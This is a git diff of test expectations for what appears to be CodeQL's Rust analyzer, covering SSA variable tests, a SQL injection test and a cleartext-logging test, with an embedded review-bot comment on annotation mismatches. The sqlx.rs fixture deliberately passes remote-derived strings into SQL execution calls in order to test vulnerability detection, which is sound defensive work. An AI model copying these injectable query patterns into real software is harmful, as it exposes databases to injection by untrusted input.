main.rs:435:5:435:7 | cap | | main.rs:432:15:434:5 | x | main.rs:430:9:430:9 | x | main.rs:433:19:433:19 | x | @@ -397,7 +437,9 @@ firstRead | main.rs:442:20:444:5 | x | main.rs:440:13:440:13 | x | main.rs:443:19:443:19 | x | | main.rs:450:13:450:20 | closure2 | main.rs:450:13:450:20 | closure2 | main.rs:453:5:453:12 | closure2 | | main.rs:453:5:453:14 | y | main.rs:448:13:448:13 | y | main.rs:454:15:454:15 | y | +| main.rs:456:13:456:13 | z | main.rs:456:13:456:13 | z | main.rs:462:15:462:15 | z | | main.rs:458:13:458:20 | closure3 | main.rs:458:13:458:20 | closure3 | main.rs:461:5:461:12 | closure3 | +| main.rs:458:24:460:5 | z | main.rs:456:13:456:13 | z | main.rs:459:9:459:9 | z | | main.rs:467:9:467:13 | block | main.rs:467:9:467:13 | block | main.rs:471:5:471:9 | block | | main.rs:471:5:471:15 | i | main.rs:466:13:466:13 | i | main.rs:472:15:472:15 | i | | main.rs:475:8:475:8 | b | main.rs:475:8:475:8 | b | main.rs:479:8:479:8 | b | 
@@ -414,11 +456,16 @@ firstRead | main.rs:521:17:521:17 | f | main.rs:521:17:521:17 | f | main.rs:525:9:525:9 | f | | main.rs:521:21:524:9 | self | main.rs:520:23:520:26 | self | main.rs:523:13:523:16 | self | | main.rs:521:22:521:22 | n | main.rs:521:22:521:22 | n | main.rs:523:25:523:25 | n | +| main.rs:531:13:531:13 | a | main.rs:531:13:531:13 | a | main.rs:532:15:532:15 | a | +| main.rs:532:15:532:15 | a | main.rs:531:13:531:13 | a | main.rs:533:5:533:5 | a | +| main.rs:535:5:535:5 | a | main.rs:531:13:531:13 | a | main.rs:536:15:536:15 | a | | main.rs:540:13:540:13 | a | main.rs:540:13:540:13 | a | main.rs:541:15:541:15 | a | | main.rs:544:5:544:5 | a | main.rs:540:13:540:13 | a | main.rs:545:15:545:15 | a | | main.rs:549:9:549:9 | x | main.rs:549:9:549:9 | x | main.rs:550:20:550:20 | x | | main.rs:553:9:553:9 | z | main.rs:553:9:553:9 | z | main.rs:554:20:554:20 | z | | main.rs:562:15:562:18 | self | main.rs:562:15:562:18 | self | main.rs:563:6:563:9 | self | +| main.rs:568:11:568:11 | a | main.rs:568:11:568:11 | a | main.rs:569:3:569:3 | a | +| main.rs:569:3:569:3 | a | main.rs:568:11:568:11 | a | main.rs:571:13:571:13 | a | | main.rs:593:9:593:22 | var_from_macro | main.rs:593:9:593:22 | var_from_macro | main.rs:595:15:595:28 | var_from_macro | | main.rs:594:9:594:25 | var_in_macro | main.rs:594:9:594:25 | var_in_macro | main.rs:594:9:594:25 | var_in_macro | | main.rs:596:9:596:20 | var_in_macro | main.rs:596:9:596:20 | var_in_macro | main.rs:601:15:601:26 | var_in_macro | 
@@ -437,12 +484,14 @@ adjacentReads | main.rs:290:9:290:11 | a10 | main.rs:279:13:279:15 | a10 | main.rs:292:9:292:11 | a10 | main.rs:296:15:296:17 | a10 | | main.rs:290:9:290:11 | a10 | main.rs:279:13:279:15 | a10 | main.rs:296:15:296:17 | a10 | main.rs:310:15:310:17 | a10 | | main.rs:333:9:333:9 | f | main.rs:333:9:333:9 | f | main.rs:336:15:336:15 | f | main.rs:342:15:342:15 | f | +| main.rs:372:5:372:5 | a | main.rs:371:13:371:13 | a | main.rs:373:15:373:15 | a | main.rs:374:11:374:11 | a | | main.rs:386:17:386:17 | x | main.rs:386:17:386:17 | x | main.rs:387:6:387:6 | x | main.rs:388:10:388:10 | x | | main.rs:386:17:386:17 | x | main.rs:386:17:386:17 | x | main.rs:388:10:388:10 | x | main.rs:389:10:389:10 | x | | main.rs:386:17:386:17 | x | main.rs:386:17:386:17 | x | main.rs:389:10:389:10 | x | main.rs:390:12:390:12 | x | | main.rs:393:22:393:22 | x | main.rs:393:22:393:22 | x | main.rs:394:6:394:6 | x | main.rs:395:10:395:10 | x | | main.rs:393:22:393:22 | x | main.rs:393:22:393:22 | x | main.rs:395:10:395:10 | x | main.rs:396:10:396:10 | x | | main.rs:393:22:393:22 | x | main.rs:393:22:393:22 | x | main.rs:396:10:396:10 | x | main.rs:398:9:398:9 | x | +| main.rs:404:22:404:27 | &mut x | main.rs:402:13:402:13 | x | main.rs:407:15:407:15 | x | main.rs:411:19:411:19 | x | | main.rs:410:9:410:9 | w | main.rs:410:9:410:9 | w | main.rs:414:9:414:9 | w | main.rs:416:7:416:7 | w | | main.rs:476:13:476:13 | x | main.rs:476:13:476:13 | x | main.rs:477:15:477:15 | x | main.rs:478:15:478:15 | x | | main.rs:480:9:480:9 | x | main.rs:476:13:476:13 | x | main.rs:481:19:481:19 | x | main.rs:482:19:482:19 | x | 
@@ -452,6 +501,7 @@ adjacentReads | main.rs:492:9:492:9 | x | main.rs:492:9:492:9 | x | main.rs:496:19:496:19 | x | main.rs:500:19:500:19 | x | | main.rs:492:9:492:9 | x | main.rs:492:9:492:9 | x | main.rs:496:19:496:19 | x | main.rs:502:19:502:19 | x | | main.rs:521:17:521:17 | f | main.rs:521:17:521:17 | f | main.rs:525:9:525:9 | f | main.rs:526:9:526:9 | f | +| main.rs:532:15:532:15 | a | main.rs:531:13:531:13 | a | main.rs:533:5:533:5 | a | main.rs:534:15:534:15 | a | | main.rs:540:13:540:13 | a | main.rs:540:13:540:13 | a | main.rs:541:15:541:15 | a | main.rs:542:5:542:5 | a | | main.rs:540:13:540:13 | a | main.rs:540:13:540:13 | a | main.rs:542:5:542:5 | a | main.rs:543:15:543:15 | a | | main.rs:549:9:549:9 | x | main.rs:549:9:549:9 | x | main.rs:550:20:550:20 | x | main.rs:551:15:551:15 | x | @@ -553,9 +603,14 @@ assigns | main.rs:333:9:333:9 | f | main.rs:334:9:335:9 | \|...\| x | | main.rs:354:13:354:13 | f | main.rs:355:13:356:13 | \|...\| x | | main.rs:362:9:362:9 | v | main.rs:362:13:362:41 | &... | +| main.rs:371:13:371:13 | a | main.rs:371:17:371:17 | 0 | +| main.rs:379:13:379:13 | i | main.rs:379:17:379:17 | 1 | | main.rs:380:9:380:13 | ref_i | main.rs:381:9:381:14 | &mut i | +| main.rs:402:13:402:13 | x | main.rs:402:17:402:17 | 2 | | main.rs:403:9:403:9 | y | main.rs:404:9:404:28 | mutate_param(...) | +| main.rs:409:13:409:13 | z | main.rs:409:17:409:17 | 4 | | main.rs:410:9:410:9 | w | main.rs:411:9:411:19 | &mut ... | +| main.rs:422:13:422:13 | x | main.rs:422:17:422:17 | 1 | | main.rs:423:9:423:9 | y | main.rs:424:9:424:14 | &mut x | | main.rs:430:9:430:9 | x | main.rs:430:13:430:15 | 100 | | main.rs:432:9:432:11 | cap | main.rs:432:15:434:5 | \|...\| ... | 
@@ -564,6 +619,7 @@ assigns | main.rs:448:13:448:13 | y | main.rs:448:17:448:17 | 2 | | main.rs:450:13:450:20 | closure2 | main.rs:450:24:452:5 | \|...\| ... | | main.rs:451:9:451:9 | y | main.rs:451:13:451:13 | 3 | +| main.rs:456:13:456:13 | z | main.rs:456:17:456:17 | 2 | | main.rs:458:13:458:20 | closure3 | main.rs:458:24:460:5 | \|...\| ... | | main.rs:466:13:466:13 | i | main.rs:466:22:466:22 | 0 | | main.rs:467:9:467:13 | block | main.rs:467:17:469:5 | { ... } | @@ -573,10 +629,13 @@ assigns | main.rs:484:9:484:9 | x | main.rs:484:13:484:13 | 3 | | main.rs:492:9:492:9 | x | main.rs:492:13:492:13 | 1 | | main.rs:521:17:521:17 | f | main.rs:521:21:524:9 | \|...\| ... | +| main.rs:531:13:531:13 | a | main.rs:531:17:531:35 | MyStruct {...} | +| main.rs:535:5:535:5 | a | main.rs:535:9:535:27 | MyStruct {...} | | main.rs:540:13:540:13 | a | main.rs:540:17:540:25 | [...] | | main.rs:544:5:544:5 | a | main.rs:544:9:544:17 | [...] | | main.rs:549:9:549:9 | x | main.rs:549:13:549:14 | 16 | | main.rs:553:9:553:9 | z | main.rs:553:13:553:14 | 17 | +| main.rs:568:11:568:11 | a | main.rs:568:15:568:33 | MyStruct {...} | | main.rs:593:9:593:22 | var_from_macro | main.rs:594:9:594:25 | MacroExpr | | main.rs:594:9:594:25 | var_in_macro | main.rs:594:23:594:24 | 37 | | main.rs:596:9:596:20 | var_in_macro | main.rs:596:24:596:25 | 33 | diff --git a/rust/ql/test/library-tests/variables/Ssa.ql b/rust/ql/test/library-tests/variables/Ssa.ql index a6005c62b008..3c72849f77ac 100644 --- a/rust/ql/test/library-tests/variables/Ssa.ql +++ b/rust/ql/test/library-tests/variables/Ssa.ql @@ -5,8 +5,6 @@ import codeql.rust.dataflow.Ssa import codeql.rust.dataflow.internal.SsaImpl import ExposedForTestingOnly -query predicate nonSsaVariable(Variable v) { not v instanceof Ssa::Variable } - query predicate definition(Ssa::Definition def, Variable v) { def.getSourceVariable() = v } query predicate read(Ssa::Definition def, Variable v, CfgNode read) { 
diff --git a/rust/ql/test/query-tests/security/CWE-089/SqlInjection.expected b/rust/ql/test/query-tests/security/CWE-089/SqlInjection.expected index 2462328c24cc..6b04453ec9ae 100644 --- a/rust/ql/test/query-tests/security/CWE-089/SqlInjection.expected +++ b/rust/ql/test/query-tests/security/CWE-089/SqlInjection.expected 
@@ -1,10 +1,13 @@ #select | sqlx.rs:62:26:62:46 | safe_query_3.as_str(...) | sqlx.rs:48:25:48:46 | ...::get | sqlx.rs:62:26:62:46 | safe_query_3.as_str(...) | This query depends on a $@. | sqlx.rs:48:25:48:46 | ...::get | user-provided value | +| sqlx.rs:65:30:65:52 | unsafe_query_2.as_str(...) | sqlx.rs:48:25:48:46 | ...::get | sqlx.rs:65:30:65:52 | unsafe_query_2.as_str(...) | This query depends on a $@. | sqlx.rs:48:25:48:46 | ...::get | user-provided value | | sqlx.rs:67:30:67:52 | unsafe_query_4.as_str(...) | sqlx.rs:48:25:48:46 | ...::get | sqlx.rs:67:30:67:52 | unsafe_query_4.as_str(...) | This query depends on a $@. | sqlx.rs:48:25:48:46 | ...::get | user-provided value | | sqlx.rs:73:25:73:45 | safe_query_3.as_str(...) | sqlx.rs:48:25:48:46 | ...::get | sqlx.rs:73:25:73:45 | safe_query_3.as_str(...) | This query depends on a $@. | sqlx.rs:48:25:48:46 | ...::get | user-provided value | +| sqlx.rs:76:29:76:51 | unsafe_query_2.as_str(...) | sqlx.rs:48:25:48:46 | ...::get | sqlx.rs:76:29:76:51 | unsafe_query_2.as_str(...) | This query depends on a $@. | sqlx.rs:48:25:48:46 | ...::get | user-provided value | | sqlx.rs:78:29:78:51 | unsafe_query_4.as_str(...) | sqlx.rs:48:25:48:46 | ...::get | sqlx.rs:78:29:78:51 | unsafe_query_4.as_str(...) | This query depends on a $@. | sqlx.rs:48:25:48:46 | ...::get | user-provided value | edges -| sqlx.rs:48:9:48:21 | remote_string | sqlx.rs:49:25:49:37 | remote_string | provenance | | +| sqlx.rs:48:9:48:21 | remote_string | sqlx.rs:49:25:49:52 | remote_string.parse(...) [Ok] | provenance | MaD:6 | +| sqlx.rs:48:9:48:21 | remote_string | sqlx.rs:54:27:54:39 | remote_string | provenance | | | sqlx.rs:48:9:48:21 | remote_string | sqlx.rs:56:34:56:89 | MacroExpr | provenance | | | sqlx.rs:48:25:48:46 | ...::get | sqlx.rs:48:25:48:69 | ...::get(...) [Ok] | provenance | Src:MaD:1 | | sqlx.rs:48:25:48:69 | ...::get(...) [Ok] | sqlx.rs:48:25:48:78 | ... .unwrap(...) | provenance | MaD:4 | 
@@ -12,27 +15,28 @@ edges | sqlx.rs:48:25:48:85 | ... .text(...) [Ok] | sqlx.rs:48:25:48:118 | ... .unwrap_or(...) | provenance | MaD:5 | | sqlx.rs:48:25:48:118 | ... .unwrap_or(...) | sqlx.rs:48:9:48:21 | remote_string | provenance | | | sqlx.rs:49:9:49:21 | remote_number | sqlx.rs:52:32:52:87 | MacroExpr | provenance | | -| sqlx.rs:49:25:49:37 | remote_string | sqlx.rs:49:25:49:52 | remote_string.parse(...) [Ok] | provenance | MaD:6 | | sqlx.rs:49:25:49:52 | remote_string.parse(...) [Ok] | sqlx.rs:49:25:49:65 | ... .unwrap_or(...) | provenance | MaD:5 | | sqlx.rs:49:25:49:65 | ... .unwrap_or(...) | sqlx.rs:49:9:49:21 | remote_number | provenance | | -| sqlx.rs:52:9:52:20 | safe_query_3 | sqlx.rs:62:26:62:37 | safe_query_3 | provenance | | -| sqlx.rs:52:9:52:20 | safe_query_3 | sqlx.rs:73:25:73:36 | safe_query_3 | provenance | | +| sqlx.rs:52:9:52:20 | safe_query_3 | sqlx.rs:62:26:62:46 | safe_query_3.as_str(...) | provenance | MaD:2 | +| sqlx.rs:52:9:52:20 | safe_query_3 | sqlx.rs:73:25:73:45 | safe_query_3.as_str(...) | provenance | MaD:2 | | sqlx.rs:52:24:52:88 | res | sqlx.rs:52:32:52:87 | { ... } | provenance | | | sqlx.rs:52:32:52:87 | ...::format(...) | sqlx.rs:52:24:52:88 | res | provenance | | | sqlx.rs:52:32:52:87 | ...::must_use(...) | sqlx.rs:52:9:52:20 | safe_query_3 | provenance | | | sqlx.rs:52:32:52:87 | MacroExpr | sqlx.rs:52:32:52:87 | ...::format(...) | provenance | MaD:3 | | sqlx.rs:52:32:52:87 | { ... } | sqlx.rs:52:32:52:87 | ...::must_use(...) 
| provenance | MaD:7 | -| sqlx.rs:56:9:56:22 | unsafe_query_4 | sqlx.rs:67:30:67:43 | unsafe_query_4 | provenance | | -| sqlx.rs:56:9:56:22 | unsafe_query_4 | sqlx.rs:78:29:78:42 | unsafe_query_4 | provenance | | +| sqlx.rs:54:9:54:22 | unsafe_query_2 [&ref] | sqlx.rs:65:30:65:43 | unsafe_query_2 [&ref] | provenance | | +| sqlx.rs:54:9:54:22 | unsafe_query_2 [&ref] | sqlx.rs:76:29:76:42 | unsafe_query_2 [&ref] | provenance | | +| sqlx.rs:54:26:54:39 | &remote_string [&ref] | sqlx.rs:54:9:54:22 | unsafe_query_2 [&ref] | provenance | | +| sqlx.rs:54:27:54:39 | remote_string | sqlx.rs:54:26:54:39 | &remote_string [&ref] | provenance | | +| sqlx.rs:56:9:56:22 | unsafe_query_4 | sqlx.rs:67:30:67:52 | unsafe_query_4.as_str(...) | provenance | MaD:2 | +| sqlx.rs:56:9:56:22 | unsafe_query_4 | sqlx.rs:78:29:78:51 | unsafe_query_4.as_str(...) | provenance | MaD:2 | | sqlx.rs:56:26:56:90 | res | sqlx.rs:56:34:56:89 | { ... } | provenance | | | sqlx.rs:56:34:56:89 | ...::format(...) | sqlx.rs:56:26:56:90 | res | provenance | | | sqlx.rs:56:34:56:89 | ...::must_use(...) | sqlx.rs:56:9:56:22 | unsafe_query_4 | provenance | | | sqlx.rs:56:34:56:89 | MacroExpr | sqlx.rs:56:34:56:89 | ...::format(...) | provenance | MaD:3 | | sqlx.rs:56:34:56:89 | { ... } | sqlx.rs:56:34:56:89 | ...::must_use(...) | provenance | MaD:7 | -| sqlx.rs:62:26:62:37 | safe_query_3 | sqlx.rs:62:26:62:46 | safe_query_3.as_str(...) | provenance | MaD:2 | -| sqlx.rs:67:30:67:43 | unsafe_query_4 | sqlx.rs:67:30:67:52 | unsafe_query_4.as_str(...) | provenance | MaD:2 | -| sqlx.rs:73:25:73:36 | safe_query_3 | sqlx.rs:73:25:73:45 | safe_query_3.as_str(...) | provenance | MaD:2 | -| sqlx.rs:78:29:78:42 | unsafe_query_4 | sqlx.rs:78:29:78:51 | unsafe_query_4.as_str(...) | provenance | MaD:2 | +| sqlx.rs:65:30:65:43 | unsafe_query_2 [&ref] | sqlx.rs:65:30:65:52 | unsafe_query_2.as_str(...) | provenance | MaD:2 | +| sqlx.rs:76:29:76:42 | unsafe_query_2 [&ref] | sqlx.rs:76:29:76:51 | unsafe_query_2.as_str(...) 
| provenance | MaD:2 | models | 1 | Source: repo:https://github.com/seanmonstar/reqwest:reqwest; crate::blocking::get; remote; ReturnValue.Field[crate::result::Result::Ok(0)] | | 2 | Summary: lang:alloc; ::as_str; Argument[self]; ReturnValue; taint | @@ -50,7 +54,6 @@ nodes | sqlx.rs:48:25:48:85 | ... .text(...) [Ok] | semmle.label | ... .text(...) [Ok] | | sqlx.rs:48:25:48:118 | ... .unwrap_or(...) | semmle.label | ... .unwrap_or(...) | | sqlx.rs:49:9:49:21 | remote_number | semmle.label | remote_number | -| sqlx.rs:49:25:49:37 | remote_string | semmle.label | remote_string | | sqlx.rs:49:25:49:52 | remote_string.parse(...) [Ok] | semmle.label | remote_string.parse(...) [Ok] | | sqlx.rs:49:25:49:65 | ... .unwrap_or(...) | semmle.label | ... .unwrap_or(...) | | sqlx.rs:52:9:52:20 | safe_query_3 | semmle.label | safe_query_3 | 
@@ -59,18 +62,21 @@ nodes | sqlx.rs:52:32:52:87 | ...::must_use(...) | semmle.label | ...::must_use(...) | | sqlx.rs:52:32:52:87 | MacroExpr | semmle.label | MacroExpr | | sqlx.rs:52:32:52:87 | { ... } | semmle.label | { ... } | +| sqlx.rs:54:9:54:22 | unsafe_query_2 [&ref] | semmle.label | unsafe_query_2 [&ref] | +| sqlx.rs:54:26:54:39 | &remote_string [&ref] | semmle.label | &remote_string [&ref] | +| sqlx.rs:54:27:54:39 | remote_string | semmle.label | remote_string | | sqlx.rs:56:9:56:22 | unsafe_query_4 | semmle.label | unsafe_query_4 | | sqlx.rs:56:26:56:90 | res | semmle.label | res | | sqlx.rs:56:34:56:89 | ...::format(...) | semmle.label | ...::format(...) | | sqlx.rs:56:34:56:89 | ...::must_use(...) | semmle.label | ...::must_use(...) | | sqlx.rs:56:34:56:89 | MacroExpr | semmle.label | MacroExpr | | sqlx.rs:56:34:56:89 | { ... } | semmle.label | { ... } | -| sqlx.rs:62:26:62:37 | safe_query_3 | semmle.label | safe_query_3 | | sqlx.rs:62:26:62:46 | safe_query_3.as_str(...) | semmle.label | safe_query_3.as_str(...) | -| sqlx.rs:67:30:67:43 | unsafe_query_4 | semmle.label | unsafe_query_4 | +| sqlx.rs:65:30:65:43 | unsafe_query_2 [&ref] | semmle.label | unsafe_query_2 [&ref] | +| sqlx.rs:65:30:65:52 | unsafe_query_2.as_str(...) | semmle.label | unsafe_query_2.as_str(...) | | sqlx.rs:67:30:67:52 | unsafe_query_4.as_str(...) | semmle.label | unsafe_query_4.as_str(...) | -| sqlx.rs:73:25:73:36 | safe_query_3 | semmle.label | safe_query_3 | | sqlx.rs:73:25:73:45 | safe_query_3.as_str(...) | semmle.label | safe_query_3.as_str(...) | -| sqlx.rs:78:29:78:42 | unsafe_query_4 | semmle.label | unsafe_query_4 | +| sqlx.rs:76:29:76:42 | unsafe_query_2 [&ref] | semmle.label | unsafe_query_2 [&ref] | +| sqlx.rs:76:29:76:51 | unsafe_query_2.as_str(...) | semmle.label | unsafe_query_2.as_str(...) | | sqlx.rs:78:29:78:51 | unsafe_query_4.as_str(...) | semmle.label | unsafe_query_4.as_str(...) | subpaths 
diff --git a/rust/ql/test/query-tests/security/CWE-089/sqlx.rs b/rust/ql/test/query-tests/security/CWE-089/sqlx.rs index f819ea3a781e..d40a4bb2a118 100644 --- a/rust/ql/test/query-tests/security/CWE-089/sqlx.rs +++ b/rust/ql/test/query-tests/security/CWE-089/sqlx.rs @@ -62,7 +62,7 @@ async fn test_sqlx_mysql(url: &str, enable_remote: bool) -> Result<(), sqlx::Err let _ = conn.execute(safe_query_3.as_str()).await?; // $ sql-sink SPURIOUS: Alert[rust/sql-injection]=remote1 let _ = conn.execute(unsafe_query_1.as_str()).await?; // $ sql-sink MISSING: Alert[rust/sql-injection]=args1 if enable_remote { - let _ = conn.execute(unsafe_query_2.as_str()).await?; // $ sql-sink MISSING: Alert[rust/sql-injection]=remote1 + let _ = conn.execute(unsafe_query_2.as_str()).await?; // $ sql-sink Alert[rust/sql-injection]=remote1 let _ = conn.execute(unsafe_query_3.as_str()).await?; // $ sql-sink MISSING: Alert[rust/sql-injection]=remote1 let _ = conn.execute(unsafe_query_4.as_str()).await?; // $ sql-sink Alert[rust/sql-injection]=remote1 } @@ -73,7 +73,7 @@ async fn test_sqlx_mysql(url: &str, enable_remote: bool) -> Result<(), sqlx::Err let _ = sqlx::query(safe_query_3.as_str()).execute(&pool).await?; // $ sql-sink SPURIOUS: Alert[rust/sql-injection]=remote1 let _ = sqlx::query(unsafe_query_1.as_str()).execute(&pool).await?; // $ sql-sink MISSING: Alert[rust/sql-injection][rust/sql-injection]=args1 if enable_remote { - let _ = sqlx::query(unsafe_query_2.as_str()).execute(&pool).await?; // $ sql-sink MISSING: Alert[rust/sql-injection]=remote1 + let _ = sqlx::query(unsafe_query_2.as_str()).execute(&pool).await?; // $ sql-sink Alert[rust/sql-injection]=remote1 let _ = sqlx::query(unsafe_query_3.as_str()).execute(&pool).await?; // $ sql-sink MISSING: Alert[rust/sql-injection]=remote1 let _ = sqlx::query(unsafe_query_4.as_str()).execute(&pool).await?; // $ sql-sink Alert[rust/sql-injection]=remote1 } 
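Review bot: The `unsafe_query_1` context line in the second hunk carries a doubled query id, `MISSING: Alert[rust/sql-injection][rust/sql-injection]=args1`, where the matching line in the first hunk has `MISSING: Alert[rust/sql-injection]=args1`. Because the expectation sits under `MISSING:`, the mismatch is probably not checked today and would only surface once the `args1` flow is detected; it is worth fixing while these annotations are being touched, as `// $ sql-sink MISSING: Alert[rust/sql-injection]=args1`. The `safe_query_3` lines are still marked `SPURIOUS` and `unsafe_query_3` still `MISSING` in both hunks, so the false positive and the remaining false negative for this SQL injection test stay open after this change. The body of `test_sqlx_mysql` starts and ends outside both hunks.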
diff --git a/rust/ql/test/query-tests/security/CWE-312/CleartextLogging.expected b/rust/ql/test/query-tests/security/CWE-312/CleartextLogging.expected index a34f9d78f520..3f417d62ebc1 100644 --- a/rust/ql/test/query-tests/security/CWE-312/CleartextLogging.expected +++ b/rust/ql/test/query-tests/security/CWE-312/CleartextLogging.expected 
@@ -180,43 +180,38 @@ edges | test_logging.rs:167:40:167:63 | ...::Some(...) [Some] | test_logging.rs:167:17:167:64 | ...::assert_failed | provenance | MaD:2 Sink:MaD:2 | | test_logging.rs:167:40:167:63 | MacroExpr | test_logging.rs:167:40:167:63 | ...::Some(...) [Some] | provenance | | | test_logging.rs:167:56:167:63 | password | test_logging.rs:167:40:167:63 | MacroExpr | provenance | | -| test_logging.rs:168:34:168:66 | MacroExpr | test_logging.rs:168:34:168:75 | ... .as_str(...) | provenance | MaD:12 | | test_logging.rs:168:34:168:66 | res | test_logging.rs:168:42:168:65 | { ... } | provenance | | | test_logging.rs:168:34:168:75 | ... .as_str(...) | test_logging.rs:168:27:168:32 | expect | provenance | MaD:1 Sink:MaD:1 | | test_logging.rs:168:42:168:65 | ...::format(...) | test_logging.rs:168:34:168:66 | res | provenance | | -| test_logging.rs:168:42:168:65 | ...::must_use(...) | test_logging.rs:168:34:168:66 | MacroExpr | provenance | | +| test_logging.rs:168:42:168:65 | ...::must_use(...) | test_logging.rs:168:34:168:75 | ... .as_str(...) | provenance | MaD:12 | | test_logging.rs:168:42:168:65 | MacroExpr | test_logging.rs:168:42:168:65 | ...::format(...) | provenance | MaD:13 | | test_logging.rs:168:42:168:65 | { ... } | test_logging.rs:168:42:168:65 | ...::must_use(...) | provenance | MaD:14 | | test_logging.rs:168:58:168:65 | password | test_logging.rs:168:42:168:65 | MacroExpr | provenance | | -| test_logging.rs:174:36:174:70 | MacroExpr | test_logging.rs:174:36:174:81 | ... .as_bytes(...) | provenance | MaD:11 | | test_logging.rs:174:36:174:70 | res | test_logging.rs:174:44:174:69 | { ... } | provenance | | | test_logging.rs:174:36:174:81 | ... .as_bytes(...) | test_logging.rs:174:30:174:34 | write | provenance | MaD:5 Sink:MaD:5 | | test_logging.rs:174:44:174:69 | ...::format(...) | test_logging.rs:174:36:174:70 | res | provenance | | -| test_logging.rs:174:44:174:69 | ...::must_use(...) 
| test_logging.rs:174:36:174:70 | MacroExpr | provenance | | +| test_logging.rs:174:44:174:69 | ...::must_use(...) | test_logging.rs:174:36:174:81 | ... .as_bytes(...) | provenance | MaD:11 | | test_logging.rs:174:44:174:69 | MacroExpr | test_logging.rs:174:44:174:69 | ...::format(...) | provenance | MaD:13 | | test_logging.rs:174:44:174:69 | { ... } | test_logging.rs:174:44:174:69 | ...::must_use(...) | provenance | MaD:14 | | test_logging.rs:174:62:174:69 | password | test_logging.rs:174:44:174:69 | MacroExpr | provenance | | -| test_logging.rs:175:40:175:74 | MacroExpr | test_logging.rs:175:40:175:85 | ... .as_bytes(...) | provenance | MaD:11 | | test_logging.rs:175:40:175:74 | res | test_logging.rs:175:48:175:73 | { ... } | provenance | | | test_logging.rs:175:40:175:85 | ... .as_bytes(...) | test_logging.rs:175:30:175:38 | write_all | provenance | MaD:6 Sink:MaD:6 | | test_logging.rs:175:48:175:73 | ...::format(...) | test_logging.rs:175:40:175:74 | res | provenance | | -| test_logging.rs:175:48:175:73 | ...::must_use(...) | test_logging.rs:175:40:175:74 | MacroExpr | provenance | | +| test_logging.rs:175:48:175:73 | ...::must_use(...) | test_logging.rs:175:40:175:85 | ... .as_bytes(...) | provenance | MaD:11 | | test_logging.rs:175:48:175:73 | MacroExpr | test_logging.rs:175:48:175:73 | ...::format(...) | provenance | MaD:13 | | test_logging.rs:175:48:175:73 | { ... } | test_logging.rs:175:48:175:73 | ...::must_use(...) | provenance | MaD:14 | | test_logging.rs:175:66:175:73 | password | test_logging.rs:175:48:175:73 | MacroExpr | provenance | | -| test_logging.rs:178:15:178:49 | MacroExpr | test_logging.rs:178:15:178:60 | ... .as_bytes(...) | provenance | MaD:11 | | test_logging.rs:178:15:178:49 | res | test_logging.rs:178:23:178:48 | { ... } | provenance | | | test_logging.rs:178:15:178:60 | ... .as_bytes(...) | test_logging.rs:178:9:178:13 | write | provenance | MaD:5 Sink:MaD:5 | | test_logging.rs:178:23:178:48 | ...::format(...) 
| test_logging.rs:178:15:178:49 | res | provenance | | -| test_logging.rs:178:23:178:48 | ...::must_use(...) | test_logging.rs:178:15:178:49 | MacroExpr | provenance | | +| test_logging.rs:178:23:178:48 | ...::must_use(...) | test_logging.rs:178:15:178:60 | ... .as_bytes(...) | provenance | MaD:11 | | test_logging.rs:178:23:178:48 | MacroExpr | test_logging.rs:178:23:178:48 | ...::format(...) | provenance | MaD:13 | | test_logging.rs:178:23:178:48 | { ... } | test_logging.rs:178:23:178:48 | ...::must_use(...) | provenance | MaD:14 | | test_logging.rs:178:41:178:48 | password | test_logging.rs:178:23:178:48 | MacroExpr | provenance | | -| test_logging.rs:181:15:181:49 | MacroExpr | test_logging.rs:181:15:181:60 | ... .as_bytes(...) | provenance | MaD:11 | | test_logging.rs:181:15:181:49 | res | test_logging.rs:181:23:181:48 | { ... } | provenance | | | test_logging.rs:181:15:181:60 | ... .as_bytes(...) | test_logging.rs:181:9:181:13 | write | provenance | MaD:4 Sink:MaD:4 | | test_logging.rs:181:23:181:48 | ...::format(...) | test_logging.rs:181:15:181:49 | res | provenance | | -| test_logging.rs:181:23:181:48 | ...::must_use(...) | test_logging.rs:181:15:181:49 | MacroExpr | provenance | | +| test_logging.rs:181:23:181:48 | ...::must_use(...) | test_logging.rs:181:15:181:60 | ... .as_bytes(...) | provenance | MaD:11 | | test_logging.rs:181:23:181:48 | MacroExpr | test_logging.rs:181:23:181:48 | ...::format(...) | provenance | MaD:13 | | test_logging.rs:181:23:181:48 | { ... } | test_logging.rs:181:23:181:48 | ...::must_use(...) | provenance | MaD:14 | | test_logging.rs:181:41:181:48 | password | test_logging.rs:181:23:181:48 | MacroExpr | provenance | | 
@@ -404,7 +399,6 @@ nodes | test_logging.rs:167:40:167:63 | MacroExpr | semmle.label | MacroExpr | | test_logging.rs:167:56:167:63 | password | semmle.label | password | | test_logging.rs:168:27:168:32 | expect | semmle.label | expect | -| test_logging.rs:168:34:168:66 | MacroExpr | semmle.label | MacroExpr | | test_logging.rs:168:34:168:66 | res | semmle.label | res | | test_logging.rs:168:34:168:75 | ... .as_str(...) | semmle.label | ... .as_str(...) | | test_logging.rs:168:42:168:65 | ...::format(...) | semmle.label | ...::format(...) | @@ -413,7 +407,6 @@ nodes | test_logging.rs:168:42:168:65 | { ... } | semmle.label | { ... } | | test_logging.rs:168:58:168:65 | password | semmle.label | password | | test_logging.rs:174:30:174:34 | write | semmle.label | write | -| test_logging.rs:174:36:174:70 | MacroExpr | semmle.label | MacroExpr | | test_logging.rs:174:36:174:70 | res | semmle.label | res | | test_logging.rs:174:36:174:81 | ... .as_bytes(...) | semmle.label | ... .as_bytes(...) | | test_logging.rs:174:44:174:69 | ...::format(...) | semmle.label | ...::format(...) | @@ -422,7 +415,6 @@ nodes | test_logging.rs:174:44:174:69 | { ... } | semmle.label | { ... } | | test_logging.rs:174:62:174:69 | password | semmle.label | password | | test_logging.rs:175:30:175:38 | write_all | semmle.label | write_all | -| test_logging.rs:175:40:175:74 | MacroExpr | semmle.label | MacroExpr | | test_logging.rs:175:40:175:74 | res | semmle.label | res | | test_logging.rs:175:40:175:85 | ... .as_bytes(...) | semmle.label | ... .as_bytes(...) | | test_logging.rs:175:48:175:73 | ...::format(...) | semmle.label | ...::format(...) | 
